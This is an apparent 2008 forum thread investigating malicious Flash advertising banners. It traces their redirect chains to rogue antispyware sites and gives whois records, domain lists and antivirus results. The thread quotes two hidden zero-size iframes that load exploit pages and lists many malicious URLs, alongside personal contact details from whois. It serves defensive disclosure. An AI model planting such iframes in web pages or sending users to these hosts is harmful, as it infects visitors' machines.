User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adtraff.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.4.13
Date: Fri, 28 Mar 2008 19:30:43 GMT
Content-Type: application/x-shockwave-flash
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.0-8+etch7
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 28 Mar 2008 19:30:43 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache

1f
FWS.....0
......D.....C....@...
0

NHL.com was first mentioned in Sandi's blog and later on in a case study called The Era of Rogue Security Software.
______________________________

Update March 29 2008.

The advertisement banner has been pulled of the main site yesterday night. Keep in mind that it will take some time before it propagates through Akamai caches.

CODE
GET /1612895/NHL_MediaMan_728x90_flash.swf HTTP/1.1
Host: m1.2mdn.net
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: close

• Finding host IP address...
• Host IP address = 72.165.141.105
• Finding TCP protocol...
• Binding to local socket...
• Connecting to host...
• Sending request...
• Waiting for response...

Receiving Header:
HTTP/1.1·404·Not·Found(CR)(LF)
Content-Length:·43(CR)(LF)
Content-Type:·image/gif(CR)(LF)
Cache-Control:·max-age=86400(CR)(LF)
Date:·Sat,·29·Mar·2008·19:10:29·GMT(CR)(LF)
Connection:·close
Kimberly
<h4>
Another goodie
</h4>
IPB Image
Seen on reddit.com.

Banner.
m1.2mdn.net/1487544/160x600_Cyberipod.swf
Campaign.
workhomecenter.com/crossdomain.xml
workhomecenter.com/stats.php?campaign=5pentt00&u=1206974120161
Kimberly
<h4>
123greetings.com
</h4>
IPB Image
Bad April Fool's day joke for 123greetings.com. Sandi has all the details here.

Banner.
imagec05.247realmedia.com/RealMedia/ads/Creatives/123Greet/ReachWe_LB_10981A/123_728x90.swf
Campaign.
adtds2.promoplexer.com/statsa.php?campaign=123
Kimberly
<h4>
New banners
</h4>
IPB Image
Details here.

Banner.
id325708.adszedo.com/300x250.swf
Campaign.
adtds2.promoplexer.com/statsa.php?campaign=708
Seen on www.diynetwork.com

Details.

adtds2.promoplexer.com/statsa.php?campaign=708&u=1207161218478
tds.promoplexer.com/statsa.php
tds.promoplexer.com/statsg.php
tds.promoplexer.com/swf/gnida.swf
adtds2.promoplexer.com/in.cgi?12
antispywaredeluxe.com/scanner/scan.php?landid=2&depid=&cid=&parid=&bs=1
______________________________

IPB Image
Details here.

Campaign.
stathome.net/c/index.php?id=cG9NaDRTS0xmeXF3TzNSaE8wTlNoPTEyMDY3MjExNDQmcG56
Y252dGE9Y3m7NkiZ5dG5leXm7NkiZwNQYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=pilgarlic5&adid=intl
<h4>
adszedo.com - 67.205.75.11
</h4>

Another dodgy advertising compagny ...

Website Title: 404 - Not Found
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-02-05
Expires: 2009-02-05
Name Server: NS.ADSZEDO.COM
Name Server: NS1.EVERYDNS.NET
Name Server: NS2.EVERYDNS.NET
Name Server: NS3.EVERYDNS.NET
Name Server: NS4.EVERYDNS.NET
Whois Server: whois.estdomains.com
Server Type: lighttpd/1.4.18
IP Address: 67.205.75.11
IP Location - Canada - Groupe Iweb Technologies Inc
Dedicated Hosting: adszedo.com is hosted on a dedicated server.

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

<h4>
antispywaredeluxe.com - 67.205.75.9
</h4>
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-02-03
Expires: 2009-02-03
Name Server: NS.ANTISPYWAREDELUXE.COM
Name Server: NS1.US.EDITDNS.NET
Name Server: NS2.US.EDITDNS.NET
Name Server: NS3.US.EDITDNS.NET
Whois Server: whois.estdomains.com
Server Type: lighttpd/1.4.18
IP Address: 67.205.75.9
IP Location - Canada - Groupe Iweb Technologies Inc

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Websites.
  1. Antispywaredeluxe.com
  2. Spywaredestructor.com (*)
(*)

ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-01-17
Expires: 2009-01-17
Registrar Status: ok
Name Server: NS.SPYWAREDESTRUCTOR.COM
Name Server: NS1.US.EDITDNS.NET (has 9,189 domains)
Name Server: NS2.US.EDITDNS.NET
Name Server: NS3.US.EDITDNS.NET

<h4>
c-net 67.205.75.*
</h4>
Has some interesting neighbours to check out.
http://www.robtex.com/cnet/67.205.75.html

imunizator.com - 67.205.75.10

ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-03-09
Expires: 2009-03-09
Name Server: NS.IMUNIZATOR.COM
Name Server: NS1.TWISTED4LIFE.COM (has 5,565 domains)
Whois Server: whois.estdomains.com
Dedicated Hosting: imunizator.com is hosted on a dedicated server.
______________________________

unicastads.com - 67.205.75.13

ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-03-31
Expires: 2009-03-31
Name Server: NS.UNICASTADS.COM
Name Server: NS1.PMSDNS.ORG (has 619 domains)
Name Server: NS2.PMSDNS.ORG
Dedicated Hosting: unicastads.com is hosted on a dedicated server.

<h4>
A very interesting article
</h4>
Malvertizements: web sites versus advertising networks and who we can blame....
Kimberly
<h4>
New banners
</h4>
Sandi found 3 more banners. Details here.

IPB Image
Campaign.
statgroup.net/crossdomain.xml

statgroup.net/c/index.php?id=TXJ5RFBVNkhNOXpSdEs3m7NkiZnRrR3JoPTEyMDY5Nzc4ODEmcG56Y252dGE9dmFmbmVxYmF2cAYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=insardonic&adid=intl
______________________________

IPB Image
Associated URLS.
openadstream.net/crossdomain.xml
openadstream.net/ad0.php?url=ads.doubleclick.net/ads/bid=28/nxtgcbb80290000125ave/direct/wi/ai&key=V24567233828272323&c=134700115
mystats.com/crossdomain.xml
mystats.com/

iexplorer-security.org/?id=634400115
<h4>
Another Goodie
</h4>
IPB Image
Campaign.
thetechnorati.com/statsa.php?u=1197651539&campaign=illationit
This banner is identical to the one that did hit Le Nouvel Observateur back in december 2007.
Kimberly
<h4>
Another Goodie
</h4>
IPB Image
Banner.
lln-videos.metacafe.com/Ads/uniquad/skyauction_728x90-metacafe-sky.swf
Campaign.
newbieadguide.com/statsa.php?campaign=servecup&u=1207239320062
______________________________

IPB Image
Banner.
lln-videos.metacafe.com/Ads/uniquad/skyauction_300x250-metacafe-sky.swf
Campaign.
newbieadguide.com/statsg.php?campaign=bettermy&u=1192995115625
Identified where & when?
metacafe.com - Oct 21 2007
As you may notice, there are 2 distinct campaigns.
______________________________

The main reason that I'm publishing these banners resides in the fact that once a malicious content is identified correctly, - read here - the administrator of the site should take the appropriate steps to delete the malicious content. It takes 2 minutes maximum to perform that. If you know the direct URL, those banners are still redirecting. Just imagine yourself for 2 seconds … someone with bad intentions linking to / hosting those banners!!!!

newbieadguide.com/statsa.php?campaign=servecup&u=1207239320062
newbieadguide.com/statsg.php?campaign=servecup&u=1207239320062
newbieadguide.com/swf/gnida.swf?campaign=servecup&u=1207239320062
newbieadguide.com/statss.php?campaign=servecup&u=1207239320062
blessedads.com/?cmpid=servecup
prevedmarketing.com/?tmn=mwatmp&aid=servecup&lid=&ax=1&ed=2&mt_info=4464_2374_2358
scanner2.malware-scan.com/5_swp/?tmn=null&aid=servecup_ma5s_mb1t&lid=&affid=&ax=1&ed=2&mt_info=4464_2374_2358:3958_0_15361
bucksbill.com/.stats/refil.php?p=5&aid=servecup_ma5s_mb1t&lid=keyin&affid=keyin
The second reason why I mention these banners is because we see xads.zedo.com as well as uniquad(s) in the full link. I can't stress enough, when accepting / buying advertisements check out who you're dealing with. This must become your primary reflex; YOUR future depends on it.
CODE
lln-videos.metacafe.com/Ads/uniquad/skyauction_728x90-metacafe-sky.swf?clickTAG=http://xads.zedo.com//ads2/c?a=340874;x=3613;g=27,0;c=487000087,487000087;i=0;n=487;s=2;i%3D0%3Bu%3DL12zYQoBABQAAFlmLu8AAAAF%3Be%3Di%3Bs%3D2%3Bg%3D27%3Bw%3D1%3Bm%3D12%3Bz%3D0.3090584325639172;k=http://www.skyauction.com/

lln-videos.metacafe.com/Ads/uniquad/skyauction_300x250-metacafe-sky.swf?clickTAG=http://xads.zedo.com//ads2/c?a=340237;x=9;g=0,0;c=487000178,487000178;i=0;n=487;s=2;s=2;g=27;m=12;w=1;u=unknown;s%3D2%3Bu%3Dunknown%3Bz%3D0.3158865410992039;k=http://www.skyauction.com/

Now, something puzzles me about those 2 advert banners. The files have been identified on 21 Oct 2007 but when you see the dates on the 2 adverts after I did download them, they show 24 December 2007 ... Weird isn't it ? People used to wget know what I mean.
IPB Image
IPB Image
Kimberly
<h4>
Another Banner
</h4>
Forwarded by a contact. This time it's a flash banner for an adult site and the advertisement has been circulating for quite a while.
IPB Image
Banner.
gb.impresionesweb.com/b/an_4137_1_1190830625.swf
Campaign.
adtraff.com/statsa.php?campaign=w00dli5t&u=1207582594269
adtraff.com/statsg.php?campaign=w00dli5t&u=1207582594269
adtraff.com/swf/gnida.swf?campaign=w00dli5t&u=1207582594269
adtraff.com/statss.php?campaign=w00dli5t&u=1207582770052
blessedads.com/?cmpid=w00dli5t&adid=728
prevedmarketing.com/?tmn=mwatmp&aid=w00dli5t&lid=728&ax=1&ed=2&mt_info=4150_1710_2358
scanner2.malware-scan.com/18_swp/?tmn=null&aid=w00dli5t_ma18s_mb1t&lid=728&affid=&ax=1&ed=2&mt_info=4150_1710_2358:3958_0_15359
<h4>
Advertising Co.
</h4>
gb.impresionesweb.com
  • 72.232.130.154
  • 72.232.130.153
  • 72.232.130.151
CustName: Alberto Garcia
Address: Major 34, 3o 1a
City: Terrassa
StateProv: Barcelona
PostalCode: 08221
Country: ES
RegDate: 2006-11-28
Updated: 2006-11-28

NetRange: 72.232.130.0 - 72.232.130.255
CIDR: 72.232.130.0/24
NetName: AOW-PRODUCTIONS-S-L
NetHandle: NET-72-232-130-0-1
Parent: NET-72-232-0-0-1
NetType: Reassigned
Comment: www.aowproductions.com, www.hostxtrem.com
______________________________

impresionesweb.com - 72.232.130.201

Website Title: Impresiones Web
Compra de publicidad, sponsor pago por CPM impresiones y CPC pago por click. impresionesweb publicidad en internet, Impresiones Web : Empresa española de publicidad por impresiones y pago por click. Impresionesweb es una empresa líder en publicidad online.
ICANN Registrar: DOMAINDISCOVER
Created: 2003-12-30
Expires: 2008-12-30
IP Location - Spain - Alberto Garcia
Name Server: NS1.DOMAINDISCOVER.COM (has 214,952 domains)
Name Server: NS2.DOMAINDISCOVER.COM
Whois Server: whois.domaindiscover.com
Registrant:
Ruboskizo SL
C/ Andres Mellado 29
Madrid, MADRID 28015
ES

Domain Name: IMPRESIONESWEB.COM

Administrative Contact, Technical Contact, Zone Contact:
Ruboskizo SL
Alberto
C/ Andres Mellado 29
Madrid, MADRID 28015
ES
0034915445873
0034915446297 [fax]

Websites.
  1. Impresiones-web.com
  2. Impresiones-web.net
  3. Impresionesweb.com
______________________________

www.iw-advertising.com - 72.232.130.156 (English website)

Website Title: Impresiones Web : Buy and Sell ads on your site. CPM and CPC. Impresiones Web, Online Advertising
Meta Description: Impresiones Web : IW-advertising: Spanish Affiliate Network, payment on impressions and pay per click, end of month. All countries.
ICANN Registrar: ENOM, INC.
Created: 2005-06-22
Expires: 2008-06-22
IP Location - Spain - Alberto Garcia
Name Server: DNS1.NAME-SERVICES.COM (has 4,494,300 domains)
Name Server: DNS2.NAME-SERVICES.COM
Name Server: DNS3.NAME-SERVICES.COM
Name Server: DNS4.NAME-SERVICES.COM
Name Server: DNS5.NAME-SERVICES.COM
Whois Server: whois.enom.com

Registration Service Provided By: ImpresionesWeb
Contact:

Domain name: iw-advertising.com

Registrant Contact:
Ruboskizo SL
NA Alberto ()
+34.915445873
Fax:
C/ Andres Mellado 29
Madrid, 28015

Websites.
  1. Iw-adserver.com
  2. Iw-advertising.com
  3. Iw-pubblicita.com
  4. Iw-publicidad.com
  5. Iw-publicidade.com
  6. Iw-publicite.com
  7. Iw-werbung.com
  8. Iwadserver.com
  9. Mundiregalo.com
  10. Iw-style.com
  11. Iwstyle.com
<h4>
Fosterfarms.com
</h4>
A second incident was forwarded to me this weekend. If you see he advertisement below for Foster Farm, don't click on it. The advertisement itself doesn't pose problem, it's the landing site.
IPB Image
The website contains 2 iframes that lead to exploits.
CODE
<iframe·src=http://myads.web.asp218.cn/asp/main.htm·width=0·height=0></iframe>
<iframe·src=http://vip.s280.xrea.com/real.html·width=0·height=0></iframe>

The user is also prompted to install the Japanese language pack if not yet present.
IPB Image
Kaspersky.
Exploit.HTML.IframeBof & Trojan-Downloader.JS.Multi.av

The website has been contacted. (Thanks Suzi)

<h4>
IP adresses
</h4>
myads.web.asp218.cn - 60.173.11.76

Domain Name: asp218.cn
ROID: 20080320s10001s56723105-cn
Registrant Organization:
Registrant Name:
Administrative Email: huasu0829@126.com
Sponsoring Registrar:
Name Server:dns21.hichina.com
Name Server:dns22.hichina.com
Registration Date: 2008-03-20 16:05
Expiration Date: 2009-03-20 16:05

Network Whois record
Queried whois.apnic.net with "60.173.11.76"...

% [whois.apnic.net node-1]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

inetnum: 60.166.0.0 - 60.175.255.255
netname: CHINANET-AH
descr: CHINANET anhui province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: JW89-AP
mnt-by: APNIC-HM
mnt-routes: MAINT-CHINANET-AH
mnt-lower: MAINT-CHINANET-AH
status: ALLOCATED PORTABLE
changed: hm-changed@apnic.net 20040721
source: APNIC

person: Chinanet Hostmaster
nic-hdl: CH93-AP
e-mail: anti-spam@ns.chinanet.cn.net
address: No.31 ,jingrong street,beijing
address: 100032
phone: +86-10-58501724
fax-no: +86-10-58501724
country: CN
changed: dingsy@cndata.com 20070416
mnt-by: MAINT-CHINANET
source: APNIC

person: Jinneng Wang
address: 17/F, Postal Building No.120 Changjiang
address: Middle Road, Hefei, Anhui, China
country: CN
phone: +86-551-2659073
fax-no: +86-551-2659287
e-mail: wang@mail.hf.ah.cninfo.net
nic-hdl: JW89-AP
mnt-by: MAINT-NEW
changed: wang@mail.hf.ah.cninfo.net 19990818
source: APNIC
______________________________

vip.s280.xrea.com - 60.32.201.101

Domain Name: XREA.COM
Registrar: KEY-SYSTEMS GMBH
Whois Server: whois.rrpproxy.net
Referral URL: http://www.key-systems.net
Name Server: NS1.VALUE-DOMAIN.COM
Name Server: NS2.VALUE-DOMAIN.COM
Name Server: NS3.VALUE-DOMAIN.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 23-jan-2008
Creation Date: 24-jul-2001
Expiration Date: 24-jul-2012

DOMAIN: XREA.COM

RSP: DigiRock Inc.
URL: http://www.value-domain.com

created-date: 2001-07-24
updated-date: 2008-01-23
registration-expiration-date: 2012-07-24

owner-contact: P-CGD92
owner-organization: DIGIROCK, INC.
owner-title: DOMAIN SECTION
owner-fname: c3fb1_VALUE
owner-lname: DOMAIN
owner-street: Chuo-ku Bakurou-cho 4-7-5
owner-city: Osaka-shi
owner-state: Osaka-fu
owner-zip: 541-0059
owner-country: JP
owner-phone: +81.662416585
owner-fax: +81.662416586
owner-email: domain-contact@digi-rock.com

Queried whois.apnic.net with "60.32.201.101"...

% [whois.apnic.net node-2]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

inetnum: 60.32.0.0 - 60.47.255.255
netname: OCN
descr: NTT Communications Corporation
descr: 1-6 Uchisaiwai-cho 1-chome Chiyoda-ku, Tokyo 100-8019 Japan
country: JP
admin-c: JNIC1-AP
tech-c: JNIC1-AP
status: ALLOCATED PORTABLE
remarks: Email address for spam or abuse complaints : abuse@ocn.ad.jp
mnt-by: MAINT-JPNIC
mnt-lower: MAINT-JPNIC
changed: hm-changed@apnic.net 20040402
changed: ip-apnic@nic.ad.jp 20050401
source: APNIC
Kimberly
<h4>
impresionesweb.com and "friends"
</h4>
Ready for another episode of the "Flash Chronicles" tonight ? Virtual Machines fired up, soda & pop-corn handy ? Ok ... let's go.

Who are the people behind impresionesweb.com? Looks keen doesn't it ?
IPB Image
Well ... digg it & assemble the pieces!!

impresionesweb.com

Registrant:
Ruboskizo SL
C/ Andres Mellado 29
Madrid, MADRID 28015

domains sharing mailservers.
  • asesinosenseries.com
  • centrodedescarga.com
  • chicalatinas.com
  • dialerporn.com
  • divinaslatinas.com
  • listadodeanimales.com
  • noticias-internacionales.com
  • noticias-nacionales.com
  • noticias-salud.com
  • noticiasdeconomia.com
  • noticiasdeespectaculos.com
  • noticiasdeporte.com
  • pasevip.com
  • pilarcastro.com
  • programacion-axn.com
  • programacion-fox.com
  • programacion-sportmania.com
  • programacion-teledeporte.com
  • programas-pocketpc.com
  • programasdecomunicacion.com
  • programasdeimagen.com
  • rincondelgato.com
  • rincondelpajaro.com
  • rincondelperro.com
  • ruboskizo.com
  • ruboskizo.net
  • todoanfibios.com
  • todoaracnidos.com
  • todoenigmas.com
  • todoinsectos.com
  • todomamiferos.com
  • todopez.com
  • todoprofetas.com
  • todoreptil.com
  • wwwimpresionesweb.com
domains sharing nameservers.
  • 270net.com
  • abc123.com
  • adorablog.org
  • agois.com
  • ahsay.com
  • alexandriacity.com
  • allamericanfood.com
  • almaknoon.com
  • alvertano.com
  • americanodyssey.org
  • americanquilter.com
  • ampache.org
  • animaleventplanner.org
  • appliancepartsforyou.com
  • ardsleytoday.com
  • asn-online.org
  • asparklingcleanjanitorialservices.com
  • audiopromotions.com
  • backensto.com
  • barvision.com
  • bettylehrman.com
  • bjorn-eriksen.com
  • brainspiral.com
  • buyfitnessstuff.com
  • callsandycampbell.com
  • cdshomes.net
  • citystatebank.com
  • civilrights.org
  • clgrp.com
  • commonwealthlists.com
  • compa.com
  • consumersunion.org
  • coreonix3.com
  • councill.com
  • da-insurance.com
  • deltasighk.org
  • digitalwebbooks.com
  • diligentis.net
  • dynogen.com
  • ecandy.com
  • eeba.org
  • exchristian.net
  • explodedlibrary.info
  • favremotor.com
  • ferrograph.com
  • fishsherrita.com
  • foks.info
  • fromthepro.com
  • getcast.com
  • gumballproductions.com
  • hatchshell.com
  • helel.net
  • hotel-moargut.com
  • infinityhigh.org
  • innernine.com
  • integritysystems.com
  • jdfactors.com
  • jimmyakin.org
  • joerlansdale.com
  • karlabonoff.com
  • kibriskadayif.com
  • labresearch.com
  • lam.org
  • leswes.net
  • lindys.com
  • liuxueusa.cn
  • lmsd.info
  • localtest.net
  • mawcr.org
  • maxent.com
  • mbvc.com
  • michiganpistoltraining.net
  • myshowguide.com
  • myvirtuallibrary.com
  • namilcoflour.com
  • nowmynetworks.com
  • nuptialnews.com
  • packworld.com
  • parttimecash.net
  • photographegatineau.com
  • pipinfo.com
  • polytechonline.net
  • quilts.com
  • reflexion.net
  • relocation.com
  • renick.org
  • ridenow.com
  • rxcel.com
  • sansome.com
  • saysoftware.com
  • solcominc.com
  • solitaire.com
  • sotic.net
  • southern-california-youth-ballet.org
  • specialhosting.net
  • sushiesque.com
  • swbcounsellors.com
  • teacherclasspage.com
  • transcendence.net
  • ventaxcatalogo.es
  • wanis.com
  • yourvirtuallibrary.com
(only showing 100 results)
______________________________

Ruboskizo SL
  • Adware.AdBars
    QUOTE
    HKEY_CURRENT_USER\Software\Ruboskizo
    "{C4CA6559-2CF1-48B6-96B2-8340A06FD129}" = "Toolbar Ruboskizo"
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Trust Database\0
    "goicfboogidikkejccmclpieicihhlpo ijbaca" = "Ruboskizo S.L."
  • Ruboskizo - Sponsor ADSL, SMS, Tarjeta de Credito - www.dialerporn.com
    dialerporn ... strange name for an ADSL Sponsor if you ask me ...
  • 1 result removed in Google search.
    In response to a complaint we received under the US Digital Millennium Copyright Act, we have removed 1 result(s) from this page. If you wish, you may read the DMCA complaint that caused the removal(s) at ChillingEffects.org.
    http://www.chillingeffects.org/notice.cgi?sID=1188
  • Fake P2P software ?
    A Webpage Copy The Design Of Www.emule-project.net
    <a href="http://forum.emule-project.net/lofiversion/index.php/t45791.html" target="_blank">http://forum.emule-project.net/lofiversion...php/t45791.html</a>
______________________________

Hey come on, let's pick out a site and make the journey a lil' bit more "spicy".

noticias-internacionales.com

Good, let's read the international headlines in Spain. Oh no, not again ... A really disturbing popup from Impresiones.
IPB Image
IPB Image
Damn it ... infected again by adverts served by our friends; and this time with Vundo.
______________________________

Filename: File.exe

File size: 56320 bytes
MD5...: 58c50fd50021f7f67af67c2ef0342e77
SHA1..: ce950da6a377c64c485aee32efe9a157e65444c0
PEiD..: -
QUOTE
File tempmbroit.exe received on 04.08.2008 00:31:10 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2008.4.8.0 2008.04.07 -
AntiVir 7.6.0.81 2008.04.07 TR/Crypt.XPACK.Gen
Authentium 4.93.8 2008.04.05 -
Avast 4.8.1169.0 2008.04.07 -
AVG 7.5.0.516 2008.04.07 -
BitDefender 7.2 2008.04.07 -
CAT-QuickHeal 9.50 2008.04.05 Win32.AdWare.Virtumonde.gen.4
ClamAV 0.92.1 2008.04.08 -
DrWeb 4.44.0.09170 2008.04.08 -
eSafe 7.0.15.0 2008.04.01 Suspicious File
eTrust-Vet 31.3.5678 2008.04.07 -
Ewido 4.0 2008.04.07 -
F-Prot 4.4.2.54 2008.04.07 -
F-Secure 6.70.13260.0 2008.04.07 -
FileAdvisor 1 2008.04.08 -
Fortinet 3.14.0.0 2008.04.07 -
Ikarus T3.1.1.26 2008.04.07 Trojan.Crypt.XPACK
Kaspersky 7.0.0.125 2008.04.08 Packed.Win32.Monder.gen
McAfee 5268 2008.04.07 -
Microsoft 1.3408 2008.04.06 Trojan:Win32/Vundo.gen!D
NOD32v2 3007 2008.04.07 -
Norman 5.80.02 2008.04.07 -
Panda 9.0.0.4 2008.04.07 -
Prevx1 V2 2008.04.08 Generic.Malware
Rising 20.38.60.00 2008.04.03 -
Sophos 4.28.0 2008.04.08 Mal/Generic-A
Sunbelt 3.0.1032.0 2008.04.07 -
Symantec 10 2008.04.07 -
TheHacker 6.2.92.267 2008.04.07 -
VBA32 3.12.6.4 2008.04.06 -
VirusBuster 4.3.26:9 2008.04.07 -
Webwasher-Gateway 6.6.2 2008.04.07 Trojan.Crypt.XPACK.Gen
______________________________

code.impresionesweb.com

That's the website serving the rotating advertisements on the websites. Google search reveals quite a few of them and one is flagged as bad.
IPB Image
______________________________

elrellano.com - 216.17.103.7

Domain Name: ELRELLANO.COM
Registrar: ENOM, INC.
Whois Server: whois.enom.com
Referral URL: http://www.enom.com
Name Server: DNS1.NAME-SERVICES.COM
Name Server: DNS2.NAME-SERVICES.COM
Name Server: DNS3.NAME-SERVICES.COM
Name Server: DNS4.NAME-SERVICES.COM
Name Server: DNS5.NAME-SERVICES.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 31-oct-2006
Creation Date: 25-may-2000
Expiration Date: 25-may-2008

Registration Service Provided By: NAVENETWORKS S.L.
Contact: urgente@gmail.com
Visit: http://www.all4domains.com/

Domain name: elrellano.com

Registrant Contact:
Magic Touch s.l.
Antonio Barragan (info@magictouch.info)

Fax: -
Apartado 9
Sevilla, 41100
ES
______________________________

info(at)magictouch.info

Q: What has that to do with all this?
A: Whoops forgot to mention the write up below ... tsss where is my head tonight. laugh.gif
COSA CELANO I SOCIAL NETWORK? - L'operazione commerciale dietro Badoo.
Google translation in English.
I could spend half of the night visiting the other websites and digg up malicious adverts but that ain't necessary I think. Please, extreme caution when accepting advertisements from this network.
Kimberly
<h4>
The redirect
</h4>
How did the redirect happen ? The main page calls the advertisement. There is a script on that page which redirects us to dating.mediastockonline.com. We clearly see code.impresionesweb.com as the Host of the first script.
IPB Image
From there we have a couple of redirects to index.php which contains an encoded script. Once decoded we end up with our file. Next we have the advertisement showing.
IPB Image
Note: The captures are from a different site I did visit - www.todorumores.com - but which serves exactly the same exploit.

<h4>
www.todorumores.com - 72.232.130.162
</h4>
Website Title: Todo Rumores es la web de famoseo donde podras saber las ultimas noticias de todos los famosos y famosas del momento
iFrames: 1 ( Parts of page not indexable by most search engines. )

ICANN Registrar: ENOM, INC.
Created: 2005-01-04
Expires: 2009-01-04
Name Server: BUYDOMAINS1.DOMAINDISCOVER.COM (has 214,708 domains)
Name Server: BUYDOMAINS2.DOMAINDISCOVER.COM
Whois Server: whois.enom.com
Server Type: Apache
IP Address: 72.232.130.162
IP Location - Spain - Alberto Garcia
Reverse IP: 89 other sites hosted on this server.

Registration Service Provided By: ImpresionesWeb
Contact:

Domain name: todorumores.com

Registrant Contact:
Ruboskizo SL
NA Alberto ()
+34.915445873
Fax:
C/ Andres Mellado 29
Madrid, 28015

Websites.
  1. 69sexo69.com
  2. Adbars.com
  3. Amoresgay.com
  4. Asesinosenseries.com
  5. Bajasexo.com
  6. Bellaslatinas.com
  7. Caosanal.com
  8. Cenalmedia.com
  9. Centrodedescarga.com
  10. Chicalatinas.com
  11. Chicasirc.com
  12. Chicosdeuniforme.com
  13. Chistesya.com
  14. Cocinarapida.com
  15. Colegialasviciosas.com
  16. Criptozoologia.net
  17. Dialerporn.com
  18. Diversiontotal.com
  19. Divinaslatinas.com
  20. Enviatonterias.com
  21. Etraductor.com
  22. Famosastv.com
  23. Fenomeno-ovni.com
  24. Fotosdegays.com
  25. Futuromania.com
  26. Grandespenes.com
  27. Guapasyjovenes.com
  28. Hajoderse.com
  29. Juegazo.com
  30. Listadodeanimales.com
  31. Madurasex.com
  32. Mangapc.com
  33. Mangazines.com
  34. Mibarra.com
  35. Micartelera.com
  36. Noticias-internacionales.com
  37. Noticias-nacionales.com
  38. Noticias-salud.com
  39. Noticiasdeciencia.com
  40. Noticiasdeconomia.com
  41. Noticiasdeespectaculos.com
  42. Noticiasdeporte.com
  43. Pasevip.com
  44. Pilarcastro.com
  45. Planetvoyeurs.com
  46. Pornoxsexo.com
  47. Portaldemos.com
  48. Postalesmix.com
  49. Programacion-axn.com
  50. Programacion-fox.com
  51. Programacion-sportmania.com
  52. Programacion-teledeporte.com
  53. Programacion-telemadrid.com
  54. Programas-pocketpc.com
  55. Programasdeaudio.com
  56. Programasdecomunicacion.com
  57. Programasdeimagen.com
  58. Programasparacomprimir.com
  59. Programasparagestion.com
  60. Programasutiles.com
  61. Quierochicas.com
  62. Quierococinar.com
  63. Rincondelgato.com
  64. Rincondelpajaro.com
  65. Rincondelperro.com
  66. Ruboskizo.com
  67. Ruboskizo.net
  68. Seriesdetelevision.com
  69. Sexodurox.com
  70. Sexoxxxsexo.com
  71. Testde.com
  72. Todoanfibios.com
  73. Todoaracnidos.com
  74. Todoasesinos.com
  75. Todoenigmas.com
  76. Todoestrenos.com
  77. Todofantasmas.com
  78. Todoinsectos.com
  79. Todoleyendas.com
  80. Todomamiferos.com
  81. Todomisterios.com
  82. Todopez.com
  83. Todoprofetas.com
  84. Todoreptil.com
  85. Todorumores.com
  86. Trabalhoonline.com
  87. Tusmoviles.com
  88. Videosyjovencitas.com
  89. Wwwimpresionesweb.com
  90. Xamateursex.com
<h4>
dating.mediastockonline.com - 85.17.166.135
</h4>
Website Title: None given.
Domain Name: MEDIASTOCKONLINE.COM
ICANN Registrar: TLDS, LLC DBA SRSPLUS
Created: 2008-01-25
Expires: 2009-01-25
Name Server: NS1.MEDIASTOCKONLINE.COM (has 1 domains)
Name Server: NS2.MEDIASTOCKONLINE.COM
Whois Server: whois.srsplus.com
Server Type: Apache/2.0.63 (FreeBSD) PHP/5.2.5 with Suhosin-Patch
IP Address: 85.17.166.135
IP Location - Netherlands - Xentronix Network

Registrant:
John Yellow (hostmaster@mediastockonline.com)
Mediastockonline Inc
Linkin park 23
Yprk city, NONE 5131
ID
12126619600

Websites.
  1. Detoxitnow.com
  2. Mediastockonline.com
  3. Yourfovaritering.com
<h4>
guyvsgirl.com - 64.40.117.19
</h4>
Website Title: Ultimate Dating Site
ICANN Registrar: GODADDY.COM, INC.
Created: 2005-06-16
Expires: 2009-06-16
Name Server: NS0.DNSMADEEASY.COM (has 122,484 domains)
Name Server: NS1.DNSMADEEASY.COM
Name Server: NS2.DNSMADEEASY.COM
Name Server: NS3.DNSMADEEASY.COM
Name Server: NS4.DNSMADEEASY.COM
Whois Server: whois.godaddy.com
Server Type: Microsoft-IIS/6.0
IP Location - Ontario - Toronto - Netnation Communications Inc
Registrant:
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States

Domain Name: GUYVSGIRL.COM
Created on: 16-Jun-05
Expires on: 16-Jun-09
Last Updated on: 01-Apr-08

Websites.
  1. 3000channelsplus.com
  2. 3000pluschannels.com
  3. 70-music.com
  4. 80-music.com
  5. 90-music.com
  6. Addetect.com
  7. Adoptionwebsearch.com
  8. Adsniffer.com
  9. Advertisercash.com
  10. Adwarebust.com
  11. Adwarecommander.com
  12. Adwaregold.com
  13. Adwarepatrol.com
  14. Adwareplatinum.com
  15. Adwareprotectionsite.com
  16. Adwareremoverxp.com
  17. Adwaresafety.com
  18. Adwarescansite.com
  19. Adwaretools.com
  20. Adwarexp.com
  21. Adwarexterminator.com
  22. Affiliatecashbot.com
  23. Affiliatescashin.com
  24. Affiliatevip.com
  25. Alertspy.com
  26. Alldigitalchannels.com
  27. Americanautobargains.com
  28. Antispamassistant.com
